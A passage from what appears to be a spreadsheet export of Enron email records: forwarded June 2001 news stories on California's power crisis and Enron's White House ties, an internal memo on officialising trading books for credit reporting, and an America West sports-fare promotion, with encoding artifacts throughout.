"Even when we got $2.6 million in emergency relief from President Clinton=_x000D_
=20_x000D_
last July, it was still not enough," Cordova said.=20_x000D_
Questions raised_x000D_
There is no general standard among charities for how much money should be=_x000D_
=20_x000D_
spent on administration and overhead vs. how many dollars are directed to t=_x000D_
he=20_x000D_
cause, nonprofit consultants say.=20_x000D_
Guidelines from the Council of Better Business Bureaus suggest that=20_x000D_
fund-raising and administrative expenses be kept below 50 percent of the=20_x000D_
organization's total income.=20_x000D_
The appropriateness of nonprofit spending can be affected by a variety of=_x000D_
=20_x000D_
factors, but most important is the specific mission of any particular=20_x000D_
charity, said Manzo, the Los Angeles management consultant.=20_x000D_
"But if people aren't getting service, that's an issue," he said. "There ma=_x000D_
y=20_x000D_
be things they could be doing differently."=20_x000D_
The paperwork can be daunting.=20_x000D_
Tax statements filed by MAAC and Campesinos Unidos contain apparent=20_x000D_
oversights. For the year ending June 1999, Campesinos Unidos failed to deta=_x000D_
il=20_x000D_
the number of clients served, and reportedly paid no contractor more than=_x000D_
=20_x000D_
$50,000 even though it spent more than $1 million on lawyers, travel and=20_x000D_
other services or supplies.=20_x000D_
MAAC reported in 1999 that it paid $5.3 million to its officers and=20_x000D_
directors, when it should have attributed that sum to all employees.=20_x000D_
Both groups spent little or nothing on fund raising -- a management policy=_x000D_
=20_x000D_
that may work against the charities' missions, Manzo said. Soliciting priva=_x000D_
te=20_x000D_
donors could raise unrestricted money for additional projects.=20_x000D_
Roger Caldwell, MAAC senior vice president, is aware of past bookkeeping=20_x000D_
problems and said new computer software to improve the system already is on=_x000D_
=20_x000D_
order. Board members are weighing whether to expand fund raising, but they=_x000D_
=20_x000D_
worry about diverting resources from existing programs.=20_x000D_
"We do the best we can with what we have," Caldwell said. "We're trying to=_x000D_
=20_x000D_
address the needs of clients. That's where we've been directing our service=_x000D_
s."_x000D_
_x000D_
=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Top energy adviser confident of gaining pact for L.A. surplus=20_x000D_
_x000D_
_x000D_
_x000D_
By Danny Pollock=20_x000D_
ASSOCIATED PRESS=20_x000D_
June 3, 2001=20_x000D_
CALIFORNIA'S POWER CRISIS=20_x000D_
_x000D_
LOS ANGELES -- California's top energy adviser vowed yesterday that the sta=_x000D_
te=20_x000D_
will get a guarantee from its biggest municipal supplier to provide power=_x000D_
=20_x000D_
through the summer.=20_x000D_
"We will get (a contract) in the next few days, one way or another" from th=_x000D_
e=20_x000D_
Los Angeles Department of Water and Power, S. David Freeman told an energy=_x000D_
=20_x000D_
summit in Studio City.=20_x000D_
"We want a contract for all its surplus over the summer," he said.=20_x000D_
Freeman, former head of the department, did not provide details. But his=20_x000D_
remark follows recent warnings by Gov. Gray Davis that he was prepared to u=_x000D_
se=20_x000D_
executive authority, if necessary, to obtain power from municipal utilities=_x000D_
=20_x000D_
and other providers at lower rates.=20_x000D_
The governor has accused city utilities of gouging the state.=20_x000D_
Freeman said the department, the state's largest municipal utility, has mad=_x000D_
e=20_x000D_
$300 million in profits by selling its excess power to the state's energy=_x000D_
=20_x000D_
grid.=20_x000D_
During a panel discussion, department assistant general manager Henry=20_x000D_
Martinez said the agency is continuing contract negotiations with the state=_x000D_
.=20_x000D_
"We're willing to negotiate .?.?. to make excess power available, but we ha=_x000D_
ve=20_x000D_
to make sure the city is taken care of first," Martinez said.=20_x000D_
Los Angeles wants to ensure it won't face blackouts or big rate increases i=_x000D_
f=20_x000D_
it makes a long-term deal to sell some of its power, he said.=20_x000D_
Californians are facing rolling blackouts this summer, even though Davis ha=_x000D_
s=20_x000D_
expedited the building of more than a dozen new power plants.=20_x000D_
Freeman said new plants would ease the energy crunch, and California should=_x000D_
=20_x000D_
be able to meet its demand by next year. The state could begin producing=20_x000D_
surplus power within two years, he said.=20_x000D_
"By 2003, we will have the problem behind us," Freeman said. "We are not=20_x000D_
fighting the war on drugs. We are breaking the back of the problem one powe=_x000D_
r=20_x000D_
plant, one efficient refrigerator and one wind plant at a time."=20_x000D_
There were no power alerts yesterday as electricity reserves stayed above 7=_x000D_
=20_x000D_
percent because of lower temperatures and more power plants back on-line.=_x000D_
=20_x000D_
A nuclear reactor at the San Onofre Nuclear Generating Station that was shu=_x000D_
t=20_x000D_
down in the wake of a February fire was restarted Friday. The reactor was=_x000D_
=20_x000D_
expected to be running at full capacity by today, cranking out enough power=_x000D_
=20_x000D_
for 840,000 homes.=20_x000D_
Freeman, in his keynote speech to the summit, praised Californians for=20_x000D_
conserving energy, noting that 9 percent less electricity in May was used=_x000D_
=20_x000D_
than during the same month last year.=20_x000D_
"Our huge weapon is the market power of the people of California cutting=20_x000D_
back," Freeman said.=20_x000D_
He also took aim at President Bush's energy plan, which calls for oil=20_x000D_
drilling in Alaska but offers little in the way of short-term help for=20_x000D_
California.=20_x000D_
"We do not need to drill in the Arctic or slash and burn what's left of=20_x000D_
America the beautiful," Freeman told the 300 people attending the summit,=_x000D_
=20_x000D_
which was sponsored by Los Angeles radio station KFWB-AM.=20_x000D_
The summit also featured Stephen Frank, chairman and CEO of Southern=20_x000D_
California Edison, and John Stout, senior vice president of Reliant Energy.=_x000D_
=20_x000D_
Reliant, a Houston-based power generator, outraged state government officia=_x000D_
ls=20_x000D_
last month when it charged California $1,900 per megawatt hour of=20_x000D_
electricity.=20_x000D_
Another generator, Duke Energy Co. of North Carolina, confirmed Friday that=_x000D_
=20_x000D_
it sold electricity in California for as much as $3,880 per megawatt hour.=_x000D_
=20_x000D_
During the panel discussion, Stout blamed high costs on a reduction of as=_x000D_
=20_x000D_
much as 25 percent in hydroelectric power from the Pacific Northwest becaus=_x000D_
e=20_x000D_
of a drought, and a sevenfold rise in the past year for natural gas, which=_x000D_
=20_x000D_
fuels generating plants.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Energy firm ties enriched top advisers to president=20_x000D_
_x000D_
_x000D_
_x000D_
Enron made big push to shape Bush's policy_x000D_
By Joseph Kahn=20_x000D_
NEW YORK TIMES NEWS SERVICE=20_x000D_
June 3, 2001=20_x000D_
WASHINGTON -- At least three top White House advisers involved in drafting=_x000D_
=20_x000D_
President Bush's energy strategy held stock in Enron Corp. or earned fees=_x000D_
=20_x000D_
from the large, Texas-based power trading company, which lobbied aggressive=_x000D_
ly=20_x000D_
to shape the administration's approach to energy issues.=20_x000D_
Karl Rove, Bush's chief political strategist; Lawrence Lindsey, the top=20_x000D_
economic coordinator; and I. Lewis Libby, Vice President Dick Cheney's chie=_x000D_
f=20_x000D_
of staff, all said in financial disclosure statements released Friday that=_x000D_
=20_x000D_
they had divested or intended to divest themselves of holdings in Enron, th=_x000D_
e=20_x000D_
nation's leading trader and marketer of electricity and natural gas, as wel=_x000D_
l=20_x000D_
as holdings in other energy companies.=20_x000D_
Lindsey received $50,000 last year from Enron for consulting. Rove's=20_x000D_
statement said he intended to sell stock holdings in Enron valued at $100,0=_x000D_
00=20_x000D_
to $250,000, though the statement does not make clear if he has completed t=_x000D_
he=20_x000D_
sale. Libby sold his stake in the company.=20_x000D_
The financial disclosures for senior White House aides show that many of=20_x000D_
Bush's top advisers are millionaires. Among the wealthiest are Rove, Lindse=_x000D_
y,=20_x000D_
Libby and Andrew Card, the chief of staff, who earned $479,138.77 as chief=_x000D_
=20_x000D_
lobbyist for General Motors and reported assets of $810,000 to $2.1 million=_x000D_
.=20_x000D_
Mary Matalin, Cheney's senior counselor and a former political commentator,=_x000D_
=20_x000D_
reported income of more than $1.5 million last year from speaking fees and=_x000D_
=20_x000D_
television appearances. Her husband, James Carville, a Democratic commentat=_x000D_
or=20_x000D_
and political adviser, made $2.1 million last year on the speaking circuit,=_x000D_
=20_x000D_
Matalin's financial disclosure shows.=20_x000D_
Enron was one of the largest contributors to Bush's presidential campaign.=_x000D_
=20_x000D_
Kenneth Lay, the chairman, has close ties to the president, as he did to=20_x000D_
Bush's father, and he has had considerable access to the Bush White House.=_x000D_
=20_x000D_
The administration's energy strategy issued last month recommended opening=_x000D_
=20_x000D_
protected lands to oil and gas drillers, building hundreds of power plants=_x000D_
=20_x000D_
and easing some environmental controls, measures strongly favored by the=20_x000D_
industry. It suggested that the federal government exercise more authority=_x000D_
=20_x000D_
over electricity transmission networks, a longtime Enron goal.=20_x000D_
Lay and other Enron officials interviewed several candidates to fill=20_x000D_
vacancies on the Federal Energy Regulatory Commission, which regulates=20_x000D_
Enron's main markets. Bush selected two people for the panel who were favor=_x000D_
ed=20_x000D_
by Enron and some other energy companies.=20_x000D_
White House officials have said that Enron's views were not crucial to thei=_x000D_
r=20_x000D_
selections._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Report: State may have little money left to head of blackouts=20_x000D_
_x000D_
_x000D_
_x000D_
ASSOCIATED PRESS=20_x000D_
June 3, 2001=20_x000D_
SANTA ANA =01) If California keeps buying high-priced power at its current =_x000D_
pace,=20_x000D_
the $12.5 billion Gov. Gray Davis hopes to borrow to head off summer=20_x000D_
blackouts will soon be gone, a newspaper reported Sunday.=20_x000D_
According to a projection of the state's numbers by The Orange County=20_x000D_
Register, the state is currently spending 66-point-nine million dollars a d=_x000D_
ay=20_x000D_
on electricity. And if it continues at this pace, it will have spent $10.4=_x000D_
=20_x000D_
billion =01) or 83 percent =01) of what it plans to borrow through a bond s=_x000D_
ale by=20_x000D_
mid-August.=20_x000D_
That leaves only $2.1 billion to buy future energy; and according to the=20_x000D_
state's own estimates, its needs at least $2.7 billion to pay for such=20_x000D_
contracts just through June 2002.=20_x000D_
But Davis' energy team says not to worry. The outlook is brightening for th=_x000D_
e=20_x000D_
energy supply because of new energy contracts =01) some taking effect this =_x000D_
month=20_x000D_
=01) continued conservation and new power plants, administration officials =_x000D_
told=20_x000D_
the Register. The increased supply should drive down prices, thus reducing=_x000D_
=20_x000D_
the average amount the state is spending each day on energy.=20_x000D_
"We'll have room to spare," said Davis spokesman Steve Maviglio.=20_x000D_
However, Brad Williams, chief economist in the nonpartisan Legislative=20_x000D_
Analyst's Office, is concerned that the governor is relying on theories.=20_x000D_
"There's certainly a vulnerability to these assumptions," Williams said. "T=_x000D_
he=20_x000D_
administration assumption that prices will fall is very risky."=20_x000D_
State Controller Kathleen Connell, a Democrat, also has her doubts.=20_x000D_
"We don't know whether the governor's estimates are correct. They haven't=_x000D_
=20_x000D_
been correct to date. ... I have always argued that $12.5 billion is not=20_x000D_
going to be enough."=20_x000D_
According to the Davis administration, it will need to repay itself only $7=_x000D_
.9=20_x000D_
billion of the bonds it plans to issue Aug. 14, leaving $4.6 billion =01)=_x000D_
=20_x000D_
presumably enough to buy an adequate supply of relatively cheap electricity=_x000D_
=20_x000D_
on long-term contracts.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
San Onofre reactor back on line, sending power to state grid=20_x000D_
_x000D_
_x000D_
_x000D_
UNION-TRIBUNE=20_x000D_
June 2, 2001=20_x000D_
SAN ONOFRE -- After four months of repairs, the nuclear power plant's Unit =_x000D_
3=20_x000D_
reactor began sending electricity to the state's power grid early yesterday=_x000D_
,=20_x000D_
officials said.=20_x000D_
Operators at San Onofre Nuclear Generating Station connected the reactor to=_x000D_
=20_x000D_
the grid at 2:30 a.m., said Ray Golden, a plant spokesman.=20_x000D_
Twelve hours later, the reactor was running at 42.5 percent of full power a=_x000D_
nd=20_x000D_
sending 350 megawatts of electricity to the grid, Golden said.=20_x000D_
The reactor, which generates 1,120 megawatts at full power -- enough=20_x000D_
electricity for at least 1 million households -- is expected to be running =_x000D_
at=20_x000D_
capacity by tomorrow morning.=20_x000D_
San Onofre's Unit 3 reactor was shut down Feb. 3 after an electrical fire=_x000D_
=20_x000D_
ignited in a switching room outside the reactor's containment dome.=20_x000D_
The fire didn't result in any release of radiation, but it did cause major=_x000D_
=20_x000D_
damage to the reactor's steam turbines and electrical generator.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
State files to manage energy on its own=20_x000D_
_x000D_
_x000D_
_x000D_
By Ed Mendel=20_x000D_
UNION-TRIBUNE STAFF WRITER and Toby Eckert=20_x000D_
COPLEY NEWS SERVICE=20_x000D_
June 2, 2001=20_x000D_
CALIFORNIA'S_x000D_
POWER CRISIS_x000D_
SACRAMENTO -- State officials and two utilities proposed yesterday that=20_x000D_
California establish itself as a regional power grid, grudgingly making the=_x000D_
=20_x000D_
offer so that federal limits on the cost of emergency power will stay in=20_x000D_
place.=20_x000D_
Federal regulators threatened to lift the price limits if California failed=_x000D_
=20_x000D_
to make a proposal to join what is known as a regional transmission=20_x000D_
organization. But California suggested that it form its own organization an=_x000D_
d=20_x000D_
not join with other states.=20_x000D_
Under the federal vision, the regional grids are steps toward an interstate=_x000D_
=20_x000D_
highway for electricity that could one day let power flow efficiently in th=_x000D_
e=20_x000D_
West as more states move toward deregulation and a free market.=20_x000D_
Filing under protest, California said it meets the criteria for a regional=_x000D_
=20_x000D_
transmission organization and proposed that it be designated as such, while=_x000D_
=20_x000D_
working with other states to improve the flow of power in the region.=20_x000D_
An official of California's power grid operator, the Independent System=20_x000D_
Operator, said the state needs to correct its own problems of soaring price=_x000D_
s=20_x000D_
and transmission congestion before joining a regional power network.=20_x000D_
Charles Robinson, ISO general counsel, said California has moved further=20_x000D_
toward a free market than states in two other organizations, RTO West and=_x000D_
=20_x000D_
Desert Star, which mainly have "vertically integrated" utilities that still=_x000D_
=20_x000D_
provide most of the generation, transmission and distribution.=20_x000D_
"While they are working out their issues, I think it would be prudent for u=_x000D_
s=20_x000D_
to work out ours before we bite off more than perhaps we can chew," Robinso=_x000D_
n=20_x000D_
said.=20_x000D_
California officials began pleading with the Federal Energy Regulatory=20_x000D_
Commission last year to impose regional price caps on power. But the order=_x000D_
=20_x000D_
the FERC finally issued April 25 only limits prices when power reserves dro=_x000D_
p=20_x000D_
to an emergency level.=20_x000D_
State officials said most power is not bought during an emergency and that=_x000D_
=20_x000D_
FERC limits will do little to control price gouging. The cost of power in=_x000D_
=20_x000D_
California is expected to grow to about $50 billion this year from $9 billi=_x000D_
on=20_x000D_
in 1999.=20_x000D_
Gov. Gray Davis remains closemouthed on specific details of the state's pow=_x000D_
er=20_x000D_
purchases, but Duke Energy revealed that it sold power during the first=20_x000D_
quarter for an average price of $136 per megawatt-hour, or more than triple=_x000D_
=20_x000D_
last year's typical rates during the same period.=20_x000D_
Duke also sold power to California for $3,880 per megawatt-hour, which=20_x000D_
translates to a retail rate of $3.80 per kilowatt-hour, or nearly 100 times=_x000D_
=20_x000D_
the typical consumer rates at this time last year.=20_x000D_
The North Carolina company said less than 1 percent of its electricity sale=_x000D_
s=20_x000D_
to California were at this price. Duke officials said the $3,880 price=20_x000D_
reflected credit surcharges the company applied because it feared nonpaymen=_x000D_
t=20_x000D_
or partial payment of its charges because of financial problems at Pacific=_x000D_
=20_x000D_
Gas and Electric Co. and Southern California Edison Co.=20_x000D_
Last month, Davis blasted Reliant Energy for selling power to the state for=_x000D_
=20_x000D_
$1,900 per megawatt-hour.=20_x000D_
Duke also said it charged the state an average $76 per megawatt-hour for=20_x000D_
power last year, or nearly double the average rate paid before California's=_x000D_
=20_x000D_
deregulated market began spiraling out of control in June 2000.=20_x000D_
Meanwhile, a Superior Court judge said yesterday that she will hold a heari=_x000D_
ng=20_x000D_
Wednesday on a demand from several newspapers in the state, including The S=_x000D_
an=20_x000D_
Diego Union-Tribune,? and a state assemblyman for specific details about=20_x000D_
long-term power contracts the state has signed.=20_x000D_
The new federal price controls were in place on two days this week when the=_x000D_
=20_x000D_
state made emergency power purchases. ISO officials said yesterday they wil=_x000D_
l=20_x000D_
not be able to say until next week if FERC limits kept prices down.=20_x000D_
"We are not confident that the benefits will necessarily prove out to be=20_x000D_
worthwhile," said Michael Kahn, ISO board chairman.=20_x000D_
The FERC approved the creation last month of RTO West, which involves nine=_x000D_
=20_x000D_
utilities in eight states stretching from the Canadian border to Nevada. A=_x000D_
=20_x000D_
second RTO, Desert Star, covers the Southwest and sprawls from Arizona to=_x000D_
=20_x000D_
western Texas and eastern Wyoming.=20_x000D_
FERC member Linda Breathitt said she was not surprised by the limited=20_x000D_
California proposal, but added that she expects California to join a=20_x000D_
multistate RTO eventually.=20_x000D_
"RTOs are evolving," Breathitt said. "While our goal may be for there to be=_x000D_
=20_x000D_
large ones, I realize that may take some time."=20_x000D_
She said it will take the FERC staff "some time to go through the filing" t=_x000D_
o=20_x000D_
determine whether it meets the RTO standards laid out by the commission.=20_x000D_
The proposal for a California-only RTO filed with the FERC yesterday came=_x000D_
=20_x000D_
from the ISO, San Diego Gas &amp; Electric Co. and Edison. PG&amp;E, the largest=20_x000D_
California utility, made a separate filing proposing that California join a=_x000D_
=20_x000D_
multistate RTO.=20_x000D_
"We feel that there are primarily reliability and efficiency reasons that a=_x000D_
=20_x000D_
regional RTO in the long run makes more sense than trying to go it alone,"=_x000D_
=20_x000D_
said John Nelson, a spokesman for PG&amp;E, which filed for bankruptcy two mont=_x000D_
hs=20_x000D_
ago.=20_x000D_
Staff writer Craig D. Rose contributed to this report.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Escondido not running power plant process, ex-official says=20_x000D_
_x000D_
_x000D_
_x000D_
By Jonathan Heller=20_x000D_
UNION-TRIBUNE STAFF WRITER=20_x000D_
June 2, 2001=20_x000D_
ESCONDIDO -- A former planning commissioner says the city's failure to set=_x000D_
=20_x000D_
standards for proposed power plants has eroded its control of the planning=_x000D_
=20_x000D_
process.=20_x000D_
"The city has taken a very inadequate position in maintaining high=20_x000D_
standards," James Di Luca said.=20_x000D_
Di Luca, who served on the commission for 31/2 years, resigned last week so=_x000D_
=20_x000D_
he could devote more time to a new job with a Carlsbad startup company, whi=_x000D_
ch=20_x000D_
he declined to name. He is an engineer who works in fiber optics and=20_x000D_
telecommunications.=20_x000D_
In his last few months as a commissioner, Di Luca urged that Escondido form=_x000D_
 a=20_x000D_
special committee of city officials and residents that would determine=20_x000D_
standards -- on such things as air pollution, noise and appearance -- for=_x000D_
=20_x000D_
proposed power plants.=20_x000D_
Instead, city officials have tried to frame the standards by taking input=_x000D_
=20_x000D_
from various sources, including the volunteer Environmental Advisory Board,=_x000D_
=20_x000D_
the Planning Commission and residents.=20_x000D_
Thus far, the City Council has yet to adopt any power plant guidelines,=20_x000D_
although it recently approved a new policy requiring all power plant=20_x000D_
proposals to qualify for a special zoning permit known as a conditional-use=_x000D_
=20_x000D_
permit. That will require a more rigorous review.=20_x000D_
Karen Allgeier, Planning Commission chairwoman, agreed with Di Luca. She sa=_x000D_
id=20_x000D_
the city's focus on small "peaker" plants, designed to provide power during=_x000D_
=20_x000D_
peak demand times, has been shortsighted.=20_x000D_
"We need to set the standards, and the power plants need to meet those=20_x000D_
standards," Allgeier said. "I realize there's a crisis, but peaker plants a=_x000D_
re=20_x000D_
just a Band-Aid on a bigger problem."=20_x000D_
Escondido should be in a favorable position when it comes to power plants=_x000D_
=20_x000D_
because high-voltage lines and a natural-gas transmission pipeline run=20_x000D_
through it, and it has an electricity substation, Di Luca said. The city is=_x000D_
=20_x000D_
also retrofitting its sewage plant to produce reclaimed water that can be=_x000D_
=20_x000D_
sold to power plants for cooling purposes.=20_x000D_
"I feel the city is in a position to be very selective in who and what we=_x000D_
=20_x000D_
choose for a power plant," he said.=20_x000D_
At one point, three peaker plants and a much larger, 500-megawatt plant wer=_x000D_
e=20_x000D_
in the city's planning pipeline. The city already has approved a 44</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 02:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">In English this means that even if a book has no positions or value,  if it _x000D_
has any deals with a counterparty it needs to be officialized so that credit _x000D_
can calculate margin._x000D_
---------------------- Forwarded by Jeffrey C Gossett/HOU/ECT on 12/11/2000 _x000D_
10:40 AM ---------------------------_x000D_
_x000D_
From: Shona Wilson@ENRON on 12/11/2000 10:35 AM_x000D_
To: Bob M Hall/NA/Enron@Enron, Leslie Reeves/HOU/ECT@ECT, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Peggy Hedstrom/CAL/ECT@ECT, Kathy Reeves/CAL/ECT@ECT, _x000D_
Stacey W White/HOU/ECT@ECT, Monica Lande/PDX/ECT@ECT, David _x000D_
Maxwell/HOU/ECT@ECT, Martha Stevens/HOU/ECT@ECT, Scott Mills/HOU/ECT@ECT, _x000D_
Scott Earnest/HOU/ECT@ECT, Michelle Bruce/HOU/ECT@ECT, Sheila _x000D_
Glover/HOU/ECT@ECT, D Todd Hall/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, _x000D_
Michael E Moscoso/HOU/ECT@ECT, Kristin Albrecht/Enron Communications@Enron _x000D_
Communications, Gary Stadler/Enron Communications@Enron Communications, _x000D_
Meredith M Eggleston/HOU/EES@EES, James New/LON/ECT@ECT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jan-Erland Bekeng/AP/Enron@Enron, _x000D_
Jay Knoblauh/HOU/ECT@ECT_x000D_
cc: Sally Beck/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, Mike _x000D_
Jordan/LON/ECT@ECT, Chris Abel/HOU/ECT@ECT, Kenneth _x000D_
Thibodeaux/NA/Enron@ENRON, Michael Benien/Corp/Enron@ENRON, Burton _x000D_
McIntyre/HOU/ECT@ECT, Susan D Trevino/HOU/ECT@ECT, Nancy _x000D_
Hernandez/NA/Enron@ENRON, Debbie R Brackett/HOU/ECT@ECT, John D _x000D_
Powell/HOU/ECT@ECT, Ganapathy Ramesh/HOU/ECT@ECT, Joel _x000D_
Henenberg/NA/Enron@Enron, Matt A Brown/HOU/ECT@ECT _x000D_
Subject: How do officialized books make it to credit?_x000D_
_x000D_
In the past few months much focus has been put on understanding VAR and how _x000D_
it is calculated (through RisktRAC).  However, everyone should note that the _x000D_
credit department also receives our information.  Market risk and credit risk _x000D_
are inherently different, with different requirements.  This memo serves as a _x000D_
reminder of what some of the key differences are, how the credit system uses _x000D_
RisktRAC differently from market risk, how this affects us, what some key _x000D_
problems are in the credit system caused by our data, and changes to be made _x000D_
by risk management groups._x000D_
_x000D_
differences are between credit and market risk - you all know this, but many _x000D_
of your ba's don't. _x000D_
when a book is flat it still has an effect on credit.  Flat books must be _x000D_
officialized_x000D_
market risk is keyed off positions and curves.  When we make money, market _x000D_
risk is reduced.  Credit risk is keyed off positions with customers.  When we _x000D_
make money, credit risk is increased, as people owe us more money._x000D_
_x000D_
how the credit system uses RisktRAC differently from market risk_x000D_
Market risk picks up all officialized books.  If a book is not officialized _x000D_
it does not pick the book up._x000D_
Credit picks up all officalized books.  If a book is not officialized, it _x000D_
picks up the previous day's position.  Therefore, if positions in book A are _x000D_
moved to book B, and A is no longer officialized, credit picks up the _x000D_
previous day's position for book A.  As a result, if a book is no longer _x000D_
used, please officialize it the first day it is no longer used, so credit _x000D_
will pick up 0 on a go forward basis._x000D_
Market risk is not concerned with counterparty codes and names._x000D_
Credit needs correct counterparty codes and names.  In recent months, the _x000D_
counterparty information has deteriorated.  Enron official counterparty names _x000D_
need to be used so they flow properly to credit._x000D_
_x000D_
what are some key problems in the credit system caused by our data_x000D_
As referenced above: correct counterparty names and books with 0 positions _x000D_
not being officialized so credit picks up previous day info._x000D_
As a takeaway from this message please ensure only correct counterparty names _x000D_
are used and that if a book has 0 positions that it is officialized the first _x000D_
day it has 0 positions._x000D_
_x000D_
If you have specific questions about credit, please call Debbie Brackett, at _x000D_
X35856. _x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Mar 2002 19:44:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'surfn.go@americawest.com'})</t>
  </si>
  <si>
    <t>Weekend Surf'n Go Sports</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
    Make a Reservation      Ticketmaster    ticketmaster  Ticketmaster has =_x000D_
tickets to most Surf'n Go Sports events. Visit Ticketmaster.com  to purchas=_x000D_
e your tickets.  Surf'n Go members can also take advantage of the following=_x000D_
 Ticketmaster / Surf'n Go Sports special: Ballet Arizona's Swan Lake in Pho=_x000D_
enix, AZ on 3/30 or 3/31/02.   15% off tickets to select performances. Purc=_x000D_
hase these special tickets .   3000 Bonus Miles  3000 Bonus Miles For Booki=_x000D_
ng Online Extended  Now you can earn 3,000 FlightFund bonus miles for each =_x000D_
roundtrip ticket purchased online and flown by 12/31/02. Learn more . Sprin=_x000D_
g Training  Spring Training in Arizona    Arizona is the home to Cactus lea=_x000D_
gue spring training. This year's training runs through Sunday, 3/31/02.  Ge=_x000D_
t away from the daily grind and let America West "take you out to the ball =_x000D_
game."  View Details     Wyndham Hotels   Need a place to stay after the ba=_x000D_
seball game?  Wyndham Hotels has a room for you. Visit Wyndham Hotels  Spri=_x000D_
ng Training section online and find a great deal on a room close to where y=_x000D_
our team is playing.   Fare Sales   [IMAGE]   Mexico Sale Save 10% on fares=_x000D_
 to/from all 10 America West destinations in Mexico.  View Details   americ=_x000D_
awest.com Sale Head to South Florida with $198 roundtrip fares to/from Fort=_x000D_
 Lauderdale, FL. View Details   Night Owl Sales If you like to fly at night=_x000D_
, here are some great fares between Las Vegas, Los Angeles, San Francisco a=_x000D_
nd Seattle and select America West destinations nationwide. View Details   =_x000D_
March Madness Sale Looking to travel to Las Vegas during March Madness for =_x000D_
some men's and women's college basketball championship action? Book your re=_x000D_
servation at americawest.com and save 10% on all non-stop flights to Las Ve=_x000D_
gas from Los Angeles (LAX), Oakland, Ontario, Reno, San Diego, San Francisc=_x000D_
o, San Jose, Sacramento and Orange County. View Details      Weekend Surf'n=_x000D_
 Go Sports Fares Travel Dates: 3/30/02-4/2/02   Support your favorite team =_x000D_
on the road or attend a great cultural event out of town next weekend with =_x000D_
Surf'n Go Sports.  These specials are for events between 3/30 - 4/1/02.    =_x000D_
 Professional Baseball (Spring Training)   [IMAGE] Event   Departure City D=_x000D_
estination City Fares Cactus League    San Francisco, CA Phoenix, AZ $168  =_x000D_
    San Jose, CA Phoenix, AZ $168  Multiple games for   Oakland, CA Phoenix=_x000D_
, AZ $168  the following teams:   Denver, CO Phoenix, AZ $198      Col. Spr=_x000D_
ings, CO Phoenix, AZ $198  Anaheim, Arizona,   St. Louis, MO Phoenix, AZ $1=_x000D_
98  Chicago (AL),          Chicago (NL), Colorado,          Milwaukee, Oakl=_x000D_
and,          San Diego, Seattle,          and San Francisco           Colo=_x000D_
rado at   Denver, CO Los Angeles, CA $208  Los Angeles   Denver, CO Orange/=_x000D_
Santa Ana, CA $208      Denver, CO Burbank, CA $208      Denver, CO Ontario=_x000D_
, CA $208      Denver, CO Long Beach, CA $208      Col. Springs, CO Los Ang=_x000D_
eles, CA $208      Col. Springs, CO Orange/Santa Ana, CA $208      Col. Spr=_x000D_
ings, CO Burbank, CA $208      Col. Springs, CO Ontario, CA $208      Col. =_x000D_
Springs, CO Long Beach, CA $208            Professional Basketball   [IMAGE=_x000D_
] Event   Departure City Destination City Fares Dallas at Washington   Dall=_x000D_
as/Ft Worth, TX Washington, DC (DCA) $172  Phoenix at Houston   Phoenix, AZ=_x000D_
 Houston, TX (IAH) $298  San Antonio at    San Antonio, TX Los Angeles, CA =_x000D_
$258  Los Angeles   San Antonio, TX Orange/Santa Ana, CA $258      San Anto=_x000D_
nio, TX Burbank, CA $258      San Antonio, TX Ontario, CA $258      San Ant=_x000D_
onio, TX Long Beach, CA $258  Toronto at Philadelphia   Toronto, OT Philade=_x000D_
lphia, PA $168            National Hockey League   [IMAGE] Event   Departur=_x000D_
e City Destination City Fares Colorado at Phoenix   Denver, CO Phoenix, AZ =_x000D_
$198      Col. Springs, CO Phoenix, AZ $198  Columbus at Dallas   Columbus,=_x000D_
 OH Dallas/Ft Worth, TX $218  New Jersey at Toronto   New York, NY (LGA) To=_x000D_
ronto, OT $168  St. Louis at Phoenix   St. Louis, MO Phoenix, AZ $198      =_x000D_
      Professional Golf   [IMAGE] Event   Departure City Destination City F=_x000D_
ares PGA Tour:    Los Angeles, CA Houston, TX (IAH) $318  Shell Houston Ope=_x000D_
n   Orange/Santa Ana, CA Houston, TX (IAH) $318      Burbank, CA Houston, T=_x000D_
X (IAH) $318      Ontario, CA Houston, TX (IAH) $318      Long Beach, CA Ho=_x000D_
uston, TX (IAH) $318            Cultural Events   [IMAGE] Event   Departure=_x000D_
 City Destination City Fares David Copperfield   Portland, OR Las Vegas, NV=_x000D_
 $188  Ballet Arizona:   San Francisco, CA Phoenix, AZ $168  Swan Lake   Sa=_x000D_
n Jose, CA Phoenix, AZ $168     Oakland, CA Phoenix, AZ $168     Denver, CO=_x000D_
 Phoenix, AZ $198     Col. Springs, CO Phoenix, AZ $198  TicketMaster    St=_x000D_
. Louis, MO Phoenix, AZ $198    Surf'n Go Sports Terms and Conditions: Purc=_x000D_
hase Ticket By:  Friday, 3/29/02, 9:00pm PST Travel Outbound: Saturday, 3/3=_x000D_
0/02 Travel Return: Monday, 4/1/02 or Tuesday, 4/2/02 Travel On: Flights op=_x000D_
erated by America West and America West Express Purchased Through: americaw=_x000D_
est.com Ticket Refundability: Non- refundable Itinerary Changes: Subject to=_x000D_
 fare availability, $100 change fee, and difference in fare if applicable M=_x000D_
inimum Stay: 2 nights  Black Out Dates: None Routing:  Roundtrip only, Rout=_x000D_
ing restrictions may apply. Portland, OR to Las Vegas, NV must be nonstop. =_x000D_
Other Discounts: Not combinable with any other discount Seat Inventory: Lim=_x000D_
ited -  subject to availability Federal Excise Tax: A $3 per flight segment=_x000D_
 Federal Excise Tax will be applied. A segment is defined as a take-off and=_x000D_
